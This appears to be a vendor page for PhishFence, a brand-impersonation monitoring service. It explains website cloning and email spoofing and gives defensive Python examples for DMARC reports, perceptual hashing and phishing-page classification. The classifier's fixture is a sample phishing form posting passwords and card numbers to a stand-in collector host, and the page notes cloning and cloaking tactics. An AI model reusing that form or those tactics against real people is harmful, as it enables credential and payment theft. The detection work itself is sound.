Use case Brand owners · trust & safety · consumer brands

Brand impersonation monitoring

If you're a brand owner, attackers are cloning your website to harvest credentials and payment data from your own customers. PhishFence finds the clones, scores their visual similarity to the real thing, and surfaces the ones impersonating you on an hourly monitoring cadence.

The attacker pattern

An attacker downloads your website (trivially easy with browser dev tools or a tool like wget --mirror) and re-hosts it on a lookalike domain such as example-login.com or example-support.com. The clone is pixel-perfect: your logo, your color scheme, your copy, even your live chat widget. The only change is the form submit action, which now points to the attacker's collector.

Traffic gets driven via phishing email, paid search ads on your brand name, SMS, or social-media DMs. Customers who land believe they're on the real site. They sign in, enter payment details, or chase a fake support flow. By the time you notice, hundreds of credentials may already be in the attacker's database.

That's the website half. The other half is email impersonation: an attacker sends mail that appears to come from your domain (or a lookalike of it) without bothering to host a cloned site at all. A fake invoice from billing@example.com, a phony account-update notice, a vendor-fraud request to redirect ACH details. Defending the brand means defending both channels: lookalike domains (this page) and the email envelope (covered by the Email Security product).

The clone pipeline
[Diagram: example.com, the real site (logo, copy, layout, forms) → scrape → pixel-perfect clone (identical UX, POST to attacker's server) → host → example-login.com, the lookalike domain (valid TLS, looks legit) → customer credentials & payment data harvested. Email, paid ads, and SMS drive the traffic.]

The other half: email impersonation

Lookalike sites need traffic to monetize. Email is one of the main ways attackers send it, and the email channel works as its own attack even when no cloned site exists. The attacker forges your envelope sender (or spoofs a lookalike domain), drops the message into your customer's inbox, and asks for a wire transfer or a password reset. SPF, DKIM, and DMARC are the protocols that let receivers reject those messages, but only if your records are configured correctly and you watch the reports.

PhishFence Email Security ingests your DMARC aggregate reports daily, enriches every sending IP with PTR + ASN + ESP attribution so you can tell Google Workspace from a Russian hosting provider at a glance, and pings you the moment a new sender shows up. The enforcement wizard then walks you from p=none to p=reject at the pace your real traffic can support, so attackers can't spoof your domain at scale.
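The aggregate-report check described above, as an added example (not PhishFence's code): it parses a constructed DMARC aggregate report in the RFC 7489 format and returns the aligned-pass rate, the senders not seen before, and the volume that would fail under a stricter policy. The report contents, the documentation-range IPs and `KNOWN_SENDERS` are assumptions.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed aggregate report (RFC 7489 schema, trimmed to the fields used).
REPORT = """<feedback>
  <policy_published><domain>example.com</domain><p>none</p></policy_published>
  <record><row><source_ip>192.0.2.10</source_ip><count>940</count>
    <policy_evaluated><disposition>none</disposition><dkim>pass</dkim><spf>pass</spf></policy_evaluated></row>
    <identifiers><header_from>example.com</header_from></identifiers></record>
  <record><row><source_ip>198.51.100.25</source_ip><count>50</count>
    <policy_evaluated><disposition>none</disposition><dkim>fail</dkim><spf>pass</spf></policy_evaluated></row>
    <identifiers><header_from>example.com</header_from></identifiers></record>
  <record><row><source_ip>203.0.113.77</source_ip><count>10</count>
    <policy_evaluated><disposition>none</disposition><dkim>fail</dkim><spf>fail</spf></policy_evaluated></row>
    <identifiers><header_from>example.com</header_from></identifiers></record>
</feedback>"""

KNOWN_SENDERS = {"192.0.2.10"}  # assumption: IPs already attributed to your own ESPs

def summarize(report_xml, known_senders):
    """Per-report DMARC view: aligned-pass rate, unseen senders, failing volume."""
    root = ET.fromstring(report_xml)
    volume = defaultdict(lambda: {"pass": 0, "fail": 0})
    for row in root.iter("row"):
        evaluated = row.find("policy_evaluated")
        # DMARC passes when either aligned DKIM or aligned SPF passes.
        ok = "pass" in (evaluated.findtext("dkim"), evaluated.findtext("spf"))
        volume[row.findtext("source_ip")]["pass" if ok else "fail"] += int(row.findtext("count"))
    total = sum(v["pass"] + v["fail"] for v in volume.values())
    return {
        "policy": root.findtext("policy_published/p"),
        "pass_rate": sum(v["pass"] for v in volume.values()) / total,
        "new_senders": sorted(ip for ip in volume if ip not in known_senders),
        # Messages per source IP that p=reject would refuse.
        "failing": {ip: v["fail"] for ip, v in volume.items() if v["fail"]},
    }

if __name__ == "__main__":
    print(summarize(REPORT, KNOWN_SENDERS))
```

A sender that passes only on SPF, like 198.51.100.25 here, still counts as DMARC-passing but is worth attributing before you tighten the policy.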

Coverage map. Brand Protection (this page) finds the lookalike sites and the typosquat domains. Email Security finds the spoofed senders and the unaligned mail. They're sold separately, so buy one, both, or neither based on what your threat model needs. See pricing for both or read the email trust & compliance use case for the email-first attack pattern.

How PhishFence detects the website half

  1. Lookalike domain discovery

    Same nine-pattern variant engine as the typosquatting use case. The candidate set is identical; what differs is what we do with it.

  2. Screenshot capture for every live candidate

    For each candidate with a responding HTTPS server, PhishFence renders the page in a headless browser and stores the screenshot. The screenshot reflects the rendered DOM, not just the page source, so clones assembled client-side are just as visible.

  3. Perceptual-hash visual similarity

    Each screenshot is hashed with a perceptual algorithm (pHash) and compared against your monitored-domain baseline. A near-zero Hamming distance is a near-perfect clone; small distances reflect minor cosmetic changes to a clone, not unrelated sites.

  4. Content classification

    A classifier scans the captured page for high-signal content: login forms, payment forms, brand-name strings, support-flow language. A page that scores high on both visual similarity and content classification is almost certainly impersonating you.

  5. Combined signal elevation

    Combined scoring elevates the few real clones above the broader pool of registered-but-parked lookalikes so your dashboard isn't drowned in noise.
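An added example (not PhishFence's code) of steps 3 and 5: a pure-Python DCT perceptual hash over constructed 32x32 grayscale grids standing in for screenshots, compared by Hamming distance and then weighted by content evidence. The layouts, the domain example-parked.com and the weighting are assumptions for illustration.

```python
import math

N, K = 32, 8  # 32x32 grayscale thumbnail in, 8x8 low-frequency DCT block kept

def phash(pixels):
    """64-bit DCT perceptual hash of an N x N grayscale grid (list of rows)."""
    cos = [[math.cos((2 * i + 1) * k * math.pi / (2 * N)) for i in range(N)]
           for k in range(K)]
    # Separable 2-D DCT-II, computed only for the K lowest frequencies per axis.
    rows = [[sum(p * c for p, c in zip(row, cos[u])) for u in range(K)]
            for row in pixels]
    coeffs = [sum(rows[y][u] * cos[v][y] for y in range(N))
              for v in range(K) for u in range(K)]
    # Bit i is set when coefficient i exceeds the median coefficient.
    median = sorted(coeffs)[len(coeffs) // 2]
    return sum(1 << i for i, c in enumerate(coeffs) if c > median)

def hamming(a, b):
    """Number of differing bits between two hashes."""
    return bin(a ^ b).count("1")

def page(blocks, background=240):
    """Constructed 'screenshot': background plus (x, y, w, h, shade) rectangles."""
    img = [[background] * N for _ in range(N)]
    for x, y, w, h, shade in blocks:
        for row in img[y:y + h]:
            row[x:x + w] = [shade] * w
    return img

# Constructed layouts: header bar, logo, sign-in panel, submit button.
BASELINE = [(0, 0, 32, 4, 40), (2, 1, 6, 2, 200), (9, 10, 15, 14, 255), (12, 19, 8, 2, 60)]
CLONE = BASELINE[:3] + [(12, 19, 8, 2, 64)]          # button shade nudged
PARKED = [(0, 14, 32, 3, 90), (20, 24, 10, 5, 30)]  # registrar parking banner

def elevate(baseline, candidates):
    """Rank (domain, blocks, evidence_count) by similarity x content evidence.
    The weighting is an illustrative assumption, not PhishFence's formula."""
    ref = phash(page(baseline))
    scored = [((1 - hamming(ref, phash(page(b))) / 64) * (1 + n), d)
              for d, b, n in candidates]
    return [d for _, d in sorted(scored, reverse=True)]

if __name__ == "__main__":
    print(elevate(BASELINE, [("example-parked.com", PARKED, 0), ("examp1e.com", CLONE, 3)]))
```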

What it looks like in PhishFence

Captured page · examp1e.com · 92% similar to baseline
[Screenshot of https://examp1e.com/login: a "Sign in to your account" form ("Enter your credentials to continue") with Email and Password fields, a Sign in button, and a "Forgot your password?" link. Captured 18m ago.]

Every live lookalike captured by PhishFence is rendered in a Chromium browser chrome frame on its alert detail page so you can see exactly what visitors would see, with the lock-icon state matching the captured TLS configuration.
Visual similarity breakdown · examp1e.com · 92% ensemble
By signal: pHash 94% · Color 97% · SSIM 81% · CLIP 92%
By region: Logo 99% · Hero 88% · Content 71% · Footer 94%
Headline is the max of desktop and mobile viewports. CLIP runs against the customer's baseline embedding on every scan.
The visual similarity score is explicit and explainable. Four signals (pHash, Color, SSIM, CLIP) plus per-region breakdown let you see exactly which part of the page the clone copied.
Content classification · examp1e.com · Confirmed Phishing
  • Password input field detected in form
  • Form action posts to non-brand domain (collect.tk)
  • Brand name found in <title> tag
  • Brand logo image pHash distance under threshold
  • Credit-card input field detected (autocomplete=cc-number)
Each alert carries a verdict (Confirmed Phishing / Likely Phishing / Suspected Impersonation / Registered Lookalike) plus the specific evidence strings that drove the classification. Useful when justifying the takedown to a registrar's abuse team.
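An added example (not PhishFence's classifier) showing how four of the evidence strings above can be derived from captured HTML with the standard-library parser; the logo pHash signal is left out. The sample page, the brand name "Example" and the brand-domain set are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class EvidenceParser(HTMLParser):
    """Collects impersonation evidence strings from one captured page."""
    def __init__(self, page_url, brand, brand_domains):
        super().__init__()
        self.page_url, self.brand, self.brand_domains = page_url, brand.lower(), brand_domains
        self.evidence, self.open_tags = [], set()  # open_tags: <title>/<form> currently open

    def is_brand_host(self, host):
        return any(host == d or host.endswith("." + d) for d in self.brand_domains)

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").strip().lower() for k, v in attrs}
        if tag in ("title", "form"):
            self.open_tags.add(tag)
        if tag == "form":
            # A relative or empty action posts back to the page's own host.
            host = urlparse(urljoin(self.page_url, a.get("action", ""))).hostname or ""
            if not self.is_brand_host(host):
                self.evidence.append(f"Form action posts to non-brand domain ({host})")
        elif tag == "input":
            if "form" in self.open_tags and a.get("type") == "password":
                self.evidence.append("Password input field detected in form")
            if "cc-number" in a.get("autocomplete", "").split():
                self.evidence.append("Credit-card input field detected (autocomplete=cc-number)")

    def handle_endtag(self, tag):
        self.open_tags.discard(tag)

    def handle_data(self, data):
        if "title" in self.open_tags and self.brand in data.lower():
            self.evidence.append("Brand name found in <title> tag")

def classify(html, page_url, brand, brand_domains):
    parser = EvidenceParser(page_url, brand, brand_domains)
    parser.feed(html)
    parser.close()
    return parser.evidence

# Constructed capture of a lookalike sign-in page.
CLONE_HTML = """<html><head><title>Example | Sign in</title></head><body>
<form action="https://collect.tk/c.php" method="post">
<input type="email" name="u"><input type="password" name="p">
<input name="card" autocomplete="cc-number"></form></body></html>"""

if __name__ == "__main__":
    print(classify(CLONE_HTML, "https://examp1e.com/login", "Example", {"example.com"}))
```

Resolving the form action against the captured URL matters: a clone that posts to a relative path is still posting to the lookalike host, not to the brand.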

Common pitfalls to avoid

  • Trusting URL alone. A defender who only checks domain names misses the page-content half of the signal. The danger here is not the URL but the rendered page; you have to actually look at what's being served.

  • Cloaking-aware attackers. Sophisticated clones serve a benign page to security scanners and the real phishing payload only to traffic arriving with the expected Referer header (paid ad / phishing email). Test with realistic referrers when validating an alert.

  • Re-baselining too late. If you redesign your real site without re-capturing your reference baseline, every screenshot diff suddenly scores high, including the legitimate one. PhishFence ships a one-click Recapture baseline button on the domain health page (Pro+) so you can add it to your launch checklist alongside the cache flush.

  • Forgetting the marketing-page surface. Clones often target your highest-conversion product page (a checkout, a sign-in flow) rather than your apex. PhishFence Pro auto-discovers your high-value paths (login, checkout, account) and baselines each one separately, so a cloned /login at attacker.com scores against the real /login instead of your homepage. Pro tracks 5 paths per domain, Business tracks 20.

Which PhishFence tier?

Pro at $99/month is the floor: screenshot capture and visual similarity scoring are Pro-tier features. Business at $499/month (100 domains) fits brands with multiple monitored domains, sub-brands, or product names that warrant separate lookalike sets and reference baselines.